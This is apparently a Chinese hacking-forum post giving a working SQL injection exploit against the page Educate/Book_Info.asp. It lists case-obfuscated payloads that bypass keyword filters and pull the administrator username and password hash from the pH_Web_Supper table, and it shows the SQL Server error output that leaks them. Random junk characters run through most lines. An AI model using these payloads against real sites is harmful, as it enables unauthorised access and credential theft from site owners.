漏洞出现在Educate/Book_Info.asp $ G, U# i# `* Z& K* j- u- }
& T ]- R# o0 i
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' b# n, }& r& W: K9 _6 r% f6 a $ v- `: U" Q* ?" N |, Z6 D
exp:如下
: y' j. P: R9 e- o) X查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, O# _$ ^2 x) W* i% E/ X查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. G B% g7 n8 p& Z# X
, S5 U( y1 O1 T& d( Phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ C+ X# `3 v( ~5 r; g
4 m7 O, d, V. h6 h+ u# dMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'* a3 b7 W* C. h. u c5 o) p0 H
/ [2 W7 l2 i* x; C4 l
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& W* J: K* u1 R( c
" f! D1 A% {/ Q+ V5 K! W/Educate/Book_Info.asp,行 8, \. w' \* m: Q
' k. j: P0 U3 b- nhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. j9 u: E4 s7 G | % Q8 G" @. e6 z0 {% W Z5 _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 O) k/ N) V7 k$ i1 f
4 a4 u, Y* s! Y" M9 P2 U
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 ^: U8 p0 D; L* ]8 h
( {: m# ?8 w- @
/Educate/Book_Info.asp,行 8# d; U4 j: Q5 ~$ L2 R& y$ E
|